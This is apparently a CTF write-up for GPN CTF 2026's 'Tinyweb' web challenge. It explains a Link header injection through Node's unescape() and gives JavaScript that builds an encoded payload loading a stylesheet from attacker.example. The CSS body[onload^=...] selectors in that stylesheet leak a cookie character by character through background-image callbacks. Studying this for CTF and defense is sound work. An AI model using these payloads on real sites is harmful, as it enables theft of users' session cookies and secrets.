![GPN CTF 2026 Tinyweb writeup — Link header CSS injection plus body[onload^=...] attribute selectors leak the cookie character-by-character](https://cybersecurityelite.com/images/articles/gpn-ctf-2026-tinyweb.png)
GPN CTF 2026 — Tinyweb: Link Header CSS Injection + Attribute Selector Exfil
**Platform:** GPN CTF 2026 (kitctf)
**Difficulty:** Medium
**OS:** Web: Node http, Link header injection, CSS attribute-selector exfil
**Tags:**

- recognising `unescape` as a percent-decoder that mangles header values
- splitting on the Link header's comma and semicolon structural separators
- injecting a second link entry with `rel=stylesheet`
- hosting the CSS on a serveo-style tunnel that doesn't show an interstitial
- iterating `body[onload^=prefix]` one character at a time

Tinyweb is GPN CTF 2026’s pure-web challenge: a 481-byte, one-line Node `http` server with two reflection points, plus an admin bot that visits attacker-supplied URLs with the flag in a cookie. The intended path turns out to be an XS-Leaks-style CSS attribute-selector exfiltration: inject `rel=stylesheet` into the Link header via the server's `unescape` percent-decoding, host CSS whose `body[onload^="prefix"]` selectors fire `background: url(...)` requests, and extend the prefix one character per round. ~45 iterations of ~35 seconds each recover: ...
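The two mechanisms the intro names, the `unescape`-driven Link header split and the per-character `body[onload^=...]` oracle, as an added JavaScript example that is not the challenge's source or the writeup author's exploit. It assumes a hypothetical reflection point of the shape in `buildLinkHeader()` (the real server may read the query through a parser that already percent-decodes once, in which case the payload needs a second layer of encoding before `unescape` sees it), a constructed attacker host `attacker.example`, and that the flag cookie ends up inside the page's `<body onload="...">` attribute, which is what the prefix selector reads. `parseLinkHeader()` is deliberately minimal: it splits link-values on commas and applies RFC 8288's rule that only the first `rel` parameter in a link-value counts, which is what lets the injected `rel=stylesheet` win over the server's own trailing `rel=preload`. One caveat a practitioner should check first: the bot's browser has to act on a `Link: ...; rel=stylesheet` response header at all (Firefox does; Chromium only processes `rel=preload`-style hints there).

```javascript
// Added example, not the Tinyweb source or the writeup author's exploit.
// Part 1 models the Link header injection through unescape(); part 2 builds
// and simulates the body[onload^=...] character oracle.
// Assumed: the server's reflection point looks like buildLinkHeader(), the
// attacker host attacker.example, and a flag that sits in <body onload="...">.

// --- Part 1: Link header split ---------------------------------------------

// Hypothetical reconstruction of the reflection point. unescape() is a full
// percent-decoder, so %2C / %3B / %3C / %3E in the value become the ',' ';'
// '<' '>' that the Link header grammar treats as structure.
function buildLinkHeader(rawParam) {
  return `<${unescape(rawParam)}>; rel=preload`;
}

// Minimal RFC 8288-style reader: link-values are comma separated, each is
// <target> followed by ;-separated params, and only the first "rel" in a
// link-value counts. Not a general parser (a ',' inside a target breaks it).
function parseLinkHeader(header) {
  const links = [];
  for (const raw of header.split(',')) {
    const m = raw.trim().match(/^<([^>]*)>(.*)$/);
    if (!m) continue;
    const params = {};
    for (const p of m[2].split(';')) {
      const [k, v] = p.split('=').map((s) => s.trim());
      if (k && !(k in params)) params[k] = v === undefined ? true : v;
    }
    links.push({ target: m[1], params });
  }
  return links;
}

// Attacker value: close the server's <...> early, start a second link-value
// pointing at the attacker stylesheet with rel=stylesheet first, and end with
// a throwaway "x=<" so the server's trailing ">; rel=preload" lands in an
// ignored parameter instead of in the stylesheet URL.
const INJECTED =
  'x%3E%3B%20rel%3Dpreload%2C' +
  '%3Chttps%3A%2F%2Fattacker.example%2Fleak.css%3E%3B%20rel%3Dstylesheet%3B%20x%3D%3C';

// --- Part 2: attribute-selector oracle --------------------------------------

// Quote a value for use inside an attribute selector; '"' and '\' are the
// only characters that need escaping inside a double-quoted CSS string.
function cssString(s) {
  return '"' + s.replace(/["\\]/g, (c) => '\\' + c) + '"';
}

// One round of CSS: one rule per candidate character. The onload attribute
// starts with at most one of the candidate prefixes, so at most one
// background image is fetched, and its URL tells the attacker which one.
function cssForPrefix(prefix, alphabet, callbackBase) {
  return [...alphabet]
    .map((c) => `body[onload^=${cssString(prefix + c)}]{background:url(${callbackBase}?c=${encodeURIComponent(c)})}`)
    .join('\n');
}

// Stand-in for the browser's selector matching: which candidate rule fires
// for a given onload attribute value? null means no rule matched, i.e. the
// value is exhausted or its next character is outside the alphabet.
function selectorHit(onloadValue, prefix, alphabet) {
  for (const c of alphabet) {
    if (onloadValue.startsWith(prefix + c)) return c;
  }
  return null;
}

// Drive the loop locally: each round extends the known prefix by the
// character whose rule fired. In the real attack every round is one admin
// bot visit with freshly generated CSS.
function recover(onloadValue, alphabet, seed = '', maxRounds = 256) {
  let prefix = seed;
  for (let i = 0; i < maxRounds; i++) {
    const c = selectorHit(onloadValue, prefix, alphabet);
    if (c === null) break;
    prefix += c;
  }
  return prefix;
}

const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}';
// Constructed demo value, not the real flag.
const DEMO_ONLOAD = 'GPNCTF{fake_flag_for_demo}';
console.log(buildLinkHeader(INJECTED));
console.log(recover(DEMO_ONLOAD, ALPHABET));
```

Two practical points the simulation hides: the stylesheet and callback URLs should carry a per-round cache-buster, otherwise the browser can serve a cached copy and the round reports nothing, and `recover()` stops the moment a character falls outside `ALPHABET`, so widen the alphabet (and the escaping in `cssString()`) before concluding the value has ended.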